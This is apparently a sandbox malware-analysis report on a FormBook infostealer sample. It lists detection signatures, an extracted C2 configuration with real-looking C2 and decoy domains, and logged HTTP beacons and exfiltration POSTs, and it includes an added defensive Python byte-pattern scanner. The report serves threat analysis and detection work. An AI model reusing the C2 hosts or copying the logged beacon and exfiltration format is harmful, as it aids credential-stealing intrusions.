Windows Analysis Report
PO#12108997.exe

Overview

General Information

Sample Name: PO#12108997.exe
Analysis ID: 626541
MD5: 5f6801fb007ede49a68943ef905b54c6
SHA1: a01e755201a0f7caec5b123db1d26776948d33c4
SHA256: ce5e4278243ecbcd11f46db7a76dc39f0ce091914bf298af73fb4e1e5391441b
Tags: exe formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.mybenefitassist.com/p12s/"], "decoy": ["kaylaspann.com", "miumiu-turkey.com", "carlomarlo.com", "roucee.com", "lizardheartmall.xyz", "cromen.finance", "harum4d.life", "codynolovenft.com", "mbughwiniadventure.com", "bodybreathintelligence.com", "dewajitu88.club", "65ur345fg.xyz", "merion.art", "crown-regroup.com", "lonazao.space", "expresspatriotsammoandguns.com", "mediapopuli.net", "stoppie.site", "nyajuicebar.com", "mackeyfi8.club", "bumesta.com", "theconttcom.com", "hgsiftaradogru.com", "bliss-togo.com", "wellnesstogether.one", "mortgagestoday.net", "chadmansfieldhomeloans.com", "gura.world", "energyhealingwithmark.com", "ifrassi.com", "actionyardgames.com", "azndmeapp.com", "brandtbusinessservices.net", "lasemdrabat.com", "waterdogsupply.com", "crosscitypest.com", "tombstoned-webapp.com", "mfeybteqb.xyz", "thefunfun3studio.space", "fs-motor.net", "evakonetworks.com", "faru.store", "procopiospizzamenu.com", "intobet543.com", "villefry.com", "courtkristineartistry.com", "mikecartonly.com", "usketoout.site", "nookmaniabuyacnhitems.com", "bygym.xyz", "tyz.world", "natwestcryptoinvestment.com", "aaeedahsbangles.com", "globalhealthindex.com", "facialmate.com", "cognitohealthcareeducation.com", "iyziw.com", "denbos.xyz", "madurababe.net", "weshoppe.net", "theclotheslibrary.com", "bysarahdeshmeh.com", "williamsonortho.com", "codegreenagroallied.com"]}
Source: PO#12108997.exe Virustotal: Detection: 34%
Source: PO#12108997.exe ReversingLabs: Detection: 61%
Source: Yara match File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: PO#12108997.exe Joe Sandbox ML: detected
Source: 4.0.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.vbc.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: PO#12108997.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: PO#12108997.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ActivityCont.pdb source: PO#12108997.exe
Source: Binary string: cmmon32.pdb source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: ActivityCont.pdbh source: PO#12108997.exe
Source: Binary string: cmmon32.pdbGCTL source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: vbc.pdb source: cmmon32.exe, 00000011.00000002.502692331.0000000004705000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4x nop then pop esi 4_2_00417311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4x nop then pop edi 4_2_0040E481
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop esi 17_2_007D7311
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop edi 17_2_007CE481
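The four entries above report the same two code patterns at two different virtual addresses: 0x00417311 and 0x0040E481 in vbc.exe (process 4), 0x007D7311 and 0x007CE481 in cmmon32.exe (process 17). Subtracting the bases the report shows for those processes (the unpacked PE at 0x400000 in vbc.exe, the memory dump at 0x7C0000 in cmmon32.exe) gives the same RVAs, 0x17311 and 0xE481, so both processes hold the same unpacked FormBook image. The following Python is an added example, not part of the Joe Sandbox report, that finds the `90 90 90 90` followed by `5E` (pop esi) or `5F` (pop edi) sequence in a buffer and normalises the hits to RVAs so that hits taken from different processes can be compared. The buffer it scans is constructed for the example with the pattern planted at the two RVAs from the report; it is not the sample.

```python
"""Locate "4x nop then pop esi/edi" sequences and compare hits across processes.

Added example, not part of the sandbox report.  The scanned buffer is constructed
here with the pattern planted at the RVAs the report lists; it is not the sample.
"""
import re

# x86: 0x90 = nop, 0x5E = pop esi, 0x5F = pop edi.
NOP_POP = re.compile(rb"\x90{4}[\x5e\x5f]")

# Load addresses the report shows for the two copies of the unpacked payload.
VBC_BASE = 0x400000      # 4.x.vbc.exe.400000.*.unpack, process 4 region at 0x400000
CMMON32_BASE = 0x7C0000  # process 0x11 (cmmon32.exe) memory dump at 0x7C0000


def find_nop_pop(image: bytes, image_base: int) -> list:
    """Return (va, rva, mnemonic) for every run of four nops followed by pop esi/edi."""
    hits = []
    for m in NOP_POP.finditer(image):
        mnemonic = "pop esi" if m.group()[-1] == 0x5E else "pop edi"
        hits.append((image_base + m.start(), m.start(), mnemonic))
    return hits


def same_payload(hits_a: list, hits_b: list) -> bool:
    """True when two hit lists agree once the per-process image base is removed."""
    strip = lambda hits: {(rva, mn) for _, rva, mn in hits}
    return strip(hits_a) == strip(hits_b)


def build_test_image(size: int = 0x18000) -> bytes:
    """Constructed buffer: int3 filler with the report's two patterns at their RVAs."""
    buf = bytearray(b"\xCC" * size)
    buf[0x17311:0x17311 + 5] = b"\x90\x90\x90\x90\x5E"  # 4_2_00417311 / 17_2_007D7311
    buf[0x0E481:0x0E481 + 5] = b"\x90\x90\x90\x90\x5F"  # 4_2_0040E481 / 17_2_007CE481
    return bytes(buf)


def format_hits(hits: list) -> list:
    """Render hits in the same style as the report's 'Code function' lines."""
    return [f"{va:#010x} (rva {rva:#x}) 4x nop then {mn}" for va, rva, mn in hits]


if __name__ == "__main__":
    image = build_test_image()
    in_vbc = find_nop_pop(image, VBC_BASE)
    in_cmmon32 = find_nop_pop(image, CMMON32_BASE)
    print("\n".join(format_hits(in_vbc) + format_hits(in_cmmon32)))
    print("same unpacked image:", same_payload(in_vbc, in_cmmon32))
```

On a real dump, pass the bytes of the unpacked region together with the base address the report gives for that region; comparing RVAs rather than VAs is what lets one hit list be reused across the hollowed vbc.exe and the later cmmon32.exe copy.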

Networking

Source: C:\Windows\explorer.exe Network Connect: 188.114.97.10 80
Source: C:\Windows\explorer.exe Domain query: www.tyz.world
Source: C:\Windows\explorer.exe Domain query: www.madurababe.net
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: Malware configuration extractor URLs: www.mybenefitassist.com/p12s/
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic HTTP traffic detected: GET /p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJA HTTP/1.1
    Host: www.tyz.world
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic HTTP traffic detected: GET /p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd HTTP/1.1
    Host: www.madurababe.net
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: Joe Sandbox View IP Address: 188.114.97.10 188.114.97.10
Source: global traffic HTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.tyz.worldConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.tyz.worldUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tyz.world/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 30 49 71 32 49 76 78 63 79 5a 38 6b 6a 6e 4f 38 75 5a 34 4e 7e 36 77 67 6d 6b 73 58 28 47 53 73 71 55 49 71 6b 6a 41 56 77 34 31 45 46 34 69 46 41 50 7a 32 32 61 36 64 6e 62 66 51 34 36 51 34 37 68 45 78 59 6a 54 68 38 47 34 54 65 34 79 76 74 53 31 4e 38 56 6f 6c 35 6f 58 64 56 6e 39 55 71 64 53 56 36 48 33 49 43 77 53 4f 67 34 63 73 68 49 4c 46 53 47 4b 70 48 52 7a 57 6c 6c 63 41 66 64 62 48 74 4b 75 30 63 31 41 6c 59 44 66 54 6d 33 46 47 30 39 4a 4e 75 48 36 30 66 58 67 51 46 31 38 43 62 50 65 31 6c 76 77 37 46 49 6d 4f 4d 34 37 42 34 67 43 48 36 65 4d 56 67 74 78 5f 45 4f 42 69 56 52 58 4b 64 67 66 30 6c 33 37 53 36 42 54 70 39 32 32 5f 68 64 6f 78 4e 6d 43 55 4e 43 76 38 30 37 4d 4d 47 57 44 51 4d 54 48 75 74 66 77 75 62 5a 56 63 4b 43 64 48 72 47 52 46 50 51 73 67 71 73 78 53 46 43 4a 4c 63 49 65 41 31 36 28 65 47 48 37 55 6e 57 79 4b 68 38 6c 5f 39 55 56 44 73 4d 37 72 4e 52 38 33 72 42 57 46 6f 46 75 56 72 52 71 79 33 68 45 36 78 52 68 6e 4c 6c 28 69 32 6a 32 37 55 66 4d 75 44 51 71 38 62 55 47 42 42 6d 77 5f 61 33 47 53 56 41 47 51 56 41 57 6e 64 72 74 37 77 7a 37 4e 49 5f 42 62 69 59 6b 61 7e 65 47 48 57 6b 73 5a 7a 35 38 71 55 51 7a 53 57 76 74 47 75 65 59 73 4a 6a 4e 44 35 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3f=0Iq2IvxcyZ8kjnO8uZ4N~6wgmksX(GSsqUIqkjAVw41EF4iFAPz22a6dnbfQ46Q47hExYjTh8G4Te4yvtS1N8Vol5oXdVn9UqdSV6H3ICwSOg4cshILFSGKpHRzWllcAfdbHtKu0c1AlYDfTm3FG09JNuH60fXgQF18CbPe1lvw7FImOM47B4gCH6eMVgtx_EOBiVRXKdgf0l37S6BTp922_hdoxNmCUNCv807MMGWDQMTHutfwubZVcKCdHrGRFPQsgqsxSFCJLcIeA16(eGH7UnWyKh8l_9UVDsM7rNR83rBWFoFuVrRqy3hE6xRhnLl(i2j27UfMuDQq8bUGBBmw_a3GSVAGQVAWndrt7wz7NI_BbiYka~eGHWksZz58qUQzSWvtGueYsJjND5A).
Source: global traffic HTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.tyz.worldConnection: closeContent-Length: 148780Cache-Control: no-cacheOrigin: http://www.tyz.worldUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tyz.world/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 30 49 71 32 49 72 46 49 30 70 6f 35 78 42 7e 5f 70 5a 6f 46 76 4c 42 39 6b 58 59 66 34 56 76 56 6e 6b 6b 36 6b 6d 4a 53 39 63 78 4a 54 6f 53 46 51 39 62 78 77 36 36 65 6c 62 66 52 70 72 74 4e 37 79 55 35 59 68 28 66 38 47 77 4d 51 66 43 6d 74 69 30 4e 38 31 74 51 28 70 32 50 56 68 30 38 71 37 4c 4b 39 48 4c 49 49 6b 7e 51 6c 5a 73 33 32 35 48 77 4d 6d 6d 67 46 52 62 54 6c 31 78 35 65 5f 6e 68 71 4c 79 32 57 6a 6f 2d 55 67 48 33 73 45 55 58 78 73 35 4b 72 46 48 71 62 30 55 63 47 30 39 69 59 4e 32 30 6f 5f 6f 35 41 4c 7e 77 49 4d 72 30 36 77 65 54 36 59 6f 6a 34 76 31 71 4f 70 42 51 53 6b 76 67 57 78 72 32 67 45 69 58 7e 44 4c 2d 79 57 47 51 7e 70 73 51 4b 31 57 64 4f 45 71 37 71 75 67 42 45 44 37 63 55 7a 57 58 67 76 45 32 53 34 6c 7a 4e 46 35 55 35 58 78 64 4f 56 31 42 79 73 77 2d 48 43 4a 66 58 62 47 6f 78 64 76 52 55 7a 28 36 74 46 44 4e 32 64 35 37 36 53 64 4c 76 73 50 71 4b 68 41 4e 6a 51 6e 79 73 32 43 53 38 43 33 48 7a 68 45 6e 73 69 4a 73 4c 6c 28 66 32 6d 44 55 58 4c 4d 75 4d 68 4b 76 58 58 75 4e 51 57 77 59 64 6a 61 55 63 54 53 41 56 41 75 6e 64 61 64 52 77 44 44 4e 45 4d 70 59 69 38 77 61 77 4f 47 48 44 55 73 4c 7a 5a 52 49 52 48 37 37 62 38 5a 67 6d 2d 6b 37 63 78 49 37 69 38 5a 48 65 36 49 68 6c 35 78 56 78 69 68 53 6e 5f 6d 6a 78 75 28 5a 59 4b 52 36 4c 6f 70 4a 67 30 37 59 42 51 4a 4a 51 76 39 59 71 49 36 35 67 78 4e 58 6c 30 74 7a 32 75 4d 4b 62 33 55 33 70 71 59 35 74 6d 46 6f 6d 36 52 38 54 41 37 38 6f 47 77 4a 56 4f 65 66 74 41 6e 79 64 4b 52 39 56 47 72 31 4e 66 76 42 41 52 56 6d 45 75 45 54 52 48 35 41 6f 30 33 4e 53 36 5a 46 30 
4d 6d 52 47 72 55 65 5a 63 78 76 55 63 49 66 71 4c 44 77 76 44 59 78 68 48 35 70 5a 6c 74 75 28 4c 45 36 4e 52 47 63 72 32 67 65 6c 66 44 45 45 46 69 51 31 48 6a 57 65 69 6d 6a 56 52 74 75 59 2d 33 58 38 43 52 43 38 4c 4b 78 6d 4b 59 48 72 76 7a 78 28 78 7e 39 64 5f 71 70 50 65 30 50 33 6e 45 6d 50 74 4e 69 46 34 77 2d 43 56 46 2d 68 74 65 5a 69 6f 38 31 79 66 39 69 47 4b 41 57 41 79 33 50 41 30 34 54 75 31 28 4b 30 58 43 69 78 71 49 6f 67 4f 4f 56 52 57 45 5a 57 42 52 4c 79 41 59 69 39 38 54 30 63 37 73 54 41 53 6b 4a 30 65 65 70 43 56 7a 43 70 73 79 7a 28 6f 76 67 56 42 56 48 78 49 42 65 59 36 70 69 5a 5a 71 48 45 45 77 33 73 37 78 4f 53 7a 54 5f 34 70 42 68 74 57 37 37 6b 38 4d 74 6f 62 42 35 28 44 71 47 6f 4d 36 7a 39 56 54 77 38 54 74 5a 4e 42 67 4b 78 74 47 69 44 78 6d 4a 62 48 37 58 76 54 71 64 42 5a 42 50 5a 48 58 76 67 52 39 71 39 64 37 4f 56 73 6c 44 35 4d 4d 54 57 66 47 4e 37 66 50 75 56 52 69 74 76 32 58 5f 76 4b 4a 49 48 69 45 44 4a 49 77 5a 56 70 78 48 30 58 6e 31 59 54 32 4e 71 64 53 66 6b 41
Source: global traffic HTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.madurababe.netConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.madurababe.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.madurababe.net/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 6a 62 34 78 69 4d 54 78 62 34 71 31 36 62 38 45 67 6b 6d 64 38 44 4b 76 45 76 51 54 31 4b 70 54 6b 45 38 35 33 33 72 62 79 66 78 53 64 70 56 34 37 64 5a 79 50 30 58 33 67 52 77 45 56 4d 42 49 51 54 70 43 6d 33 5a 39 65 2d 39 39 61 4d 7a 34 51 6b 4b 33 68 31 6a 76 53 57 30 71 6f 77 54 66 47 70 7a 35 7e 6f 43 72 64 4d 63 34 74 63 36 41 67 6b 6d 37 6c 4c 45 59 49 6c 72 4b 72 43 38 7a 78 62 63 69 35 31 30 43 59 4b 41 36 38 55 77 36 50 62 28 72 6f 6b 76 48 6a 61 4c 65 66 6a 33 30 77 68 58 78 57 7a 73 57 6e 61 79 59 4d 6e 31 58 6d 58 6a 44 4f 59 64 76 4f 4c 6b 4d 56 56 4b 4b 4d 33 58 6f 34 77 6a 5f 41 78 52 4b 32 62 31 36 63 73 6a 62 43 4c 6e 69 61 4b 71 70 48 77 51 39 30 4b 6e 47 58 6b 41 33 47 30 70 68 61 79 4f 57 71 43 6a 69 64 42 61 76 73 4b 75 4b 38 36 33 54 41 42 72 6b 31 59 6b 78 5a 6f 75 37 64 77 31 42 34 6f 41 78 76 65 71 39 64 61 6c 44 43 48 6c 76 39 57 30 6b 59 46 54 41 75 6e 79 5a 66 44 6d 4b 49 44 45 32 4a 32 72 66 68 35 70 68 47 52 54 6c 68 42 39 6f 28 51 4b 37 33 31 42 43 63 45 42 37 61 61 76 45 39 39 73 4d 28 30 59 64 31 65 48 50 72 7a 43 77 28 6a 35 4b 38 42 62 43 75 75 78 34 78 68 34 49 7a 64 66 68 4a 6d 6f 66 4e 70 57 65 68 47 4b 48 54 45 73 4c 4a 31 69 75 68 4f 51 75 65 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3f=jb4xiMTxb4q16b8Egkmd8DKvEvQT1KpTkE8533rbyfxSdpV47dZyP0X3gRwEVMBIQTpCm3Z9e-99aMz4QkK3h1jvSW0qowTfGpz5~oCrdMc4tc6Agkm7lLEYIlrKrC8zxbci510CYKA68Uw6Pb(rokvHjaLefj30whXxWzsWnayYMn1XmXjDOYdvOLkMVVKKM3Xo4wj_AxRK2b16csjbCLniaKqpHwQ90KnGXkA3G0phayOWqCjidBavsKuK863TABrk1YkxZou7dw1B4oAxveq9dalDCHlv9W0kYFTAunyZfDmKIDE2J2rfh5phGRTlhB9o(QK731BCcEB7aavE99sM(0Yd1eHPrzCw(j5K8BbCuux4xh4IzdfhJmofNpWehGKHTEsLJ1iuhOQuew).
Source: global traffic HTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.madurababe.netConnection: closeContent-Length: 148780Cache-Control: no-cacheOrigin: http://www.madurababe.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.madurababe.net/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 6a 62 34 78 69 49 4f 4b 5a 70 65 5f 78 4f 74 6a 68 33 65 46 34 43 36 44 41 76 39 66 38 39 45 69 74 7a 74 6e 33 30 7a 66 35 36 55 4e 58 5a 46 34 76 76 41 36 51 30 58 30 78 68 77 46 65 73 45 6f 4f 7a 41 42 6d 32 63 6f 65 2d 31 2d 52 70 7e 79 55 6b 4c 78 7a 46 75 4b 55 57 67 78 6f 31 4b 33 47 4c 66 68 31 49 4f 72 43 49 77 36 6f 2d 43 62 70 46 37 71 72 61 38 52 4f 6e 72 70 72 77 6f 68 78 35 68 31 7e 30 34 41 50 5a 63 6c 35 55 67 42 46 71 33 6b 6d 51 48 36 36 74 4b 61 51 69 37 77 78 6c 4b 4f 4b 68 45 52 75 4b 71 65 4a 67 35 31 6a 6c 50 55 49 4a 74 64 4f 4e 41 63 52 6d 65 68 61 41 58 67 33 69 47 6b 4c 6b 31 62 35 49 77 6e 50 34 43 74 41 4c 58 4e 48 59 7a 72 44 68 4d 53 33 49 76 57 61 68 55 6d 44 47 4e 74 43 33 79 75 72 78 4f 74 41 52 71 51 32 5a 4f 37 72 37 58 68 44 44 47 4c 28 59 6b 53 55 49 75 6e 56 6d 49 34 28 50 59 36 75 66 61 66 57 35 46 74 47 54 52 72 7e 56 51 33 48 30 62 46 6f 57 4f 76 55 53 32 63 5a 43 52 34 59 52 62 5f 6c 35 70 38 4c 7a 72 73 68 42 39 6b 28 56 7e 64 32 42 42 43 63 57 35 6f 63 37 76 2d 71 4e 73 46 73 30 49 62 73 2d 37 66 72 79 6d 77 75 42 68 7a 39 79 4c 43 70 39 35 37 78 44 41 49 67 39 66 68 45 47 70 2d 4e 5a 7a 70 74 48 43 71 56 32 63 51 44 67 48 42 6b 66 39 6a 4f 70 33 72 59 6c 51 62 77 79 62 76 30 7a 75 46 56 4b 32 59 42 74 67 2d 69 34 72 30 72 45 73 53 49 36 32 4f 48 48 6f 35 54 52 31 41 39 77 6c 34 49 50 76 39 54 46 54 64 4e 36 58 31 75 33 72 4a 63 52 32 4d 6c 6d 4c 78 65 59 74 73 28 36 6a 55 7a 45 37 6c 59 45 6b 2d 4c 6f 42 47 54 32 7a 77 37 47 6e 57 38 45 74 53 39 2d 4a 69 38 6e 41 56 76 75 35 78 71 70 44 62 
73 79 68 41 35 77 71 72 56 54 77 68 7a 34 4a 71 4d 37 66 77 6b 6b 55 31 30 33 38 42 73 56 30 41 73 68 33 5f 58 67 64 4a 57 66 47 30 33 35 77 33 67 70 79 42 53 48 64 33 4d 32 32 42 47 4a 39 30 6d 38 78 79 62 46 4d 35 73 57 74 53 69 5a 53 4b 76 63 4e 44 39 45 72 79 31 5a 6f 6d 78 79 55 52 71 4d 6f 41 6b 4c 76 4b 79 34 59 58 5a 49 4d 57 4a 53 6b 75 67 4a 55 4d 37 32 39 67 30 75 47 55 45 50 35 31 68 6a 28 76 58 6d 4e 55 4e 53 45 2d 52 35 45 43 69 36 4b 4f 42 64 50 6f 53 4a 64 30 61 47 35 61 6e 61 4d 46 31 58 77 46 31 6f 50 54 62 38 42 62 36 62 49 55 79 51 71 59 35 69 76 4a 6c 62 79 56 7a 49 58 4d 64 50 4a 42 39 36 49 77 35 56 30 72 66 35 62 44 6e 59 68 34 72 53 37 4c 38 4a 5a 36 6f 30 63 33 6c 31 70 33 74 38 73 53 7a 39 54 4b 33 4e 62 43 43 31 32 7a 4d 34 62 72 68 63 51 48 35 33 70 64 55 51 62 4d 74 67 62 56 52 36 6c 6b 72 61 6d 5a 46 71 6d 79 71 48 76 48 32 67 37 55 61 57 46 4e 55 6a 64 59 6c 49 30 37 32 64 58 6b 71 5f 75 75 55 7a 69 41 4a 71 7e 46 4e 64 38 39 52 45 52 68 46 39 4f 73 72 4c 63 4e 5a 52 53 6e 78
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 14 May 2022 09:55:46 GMTContent-Type: text/htmlContent-Length: 291ETag: "627e7264-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
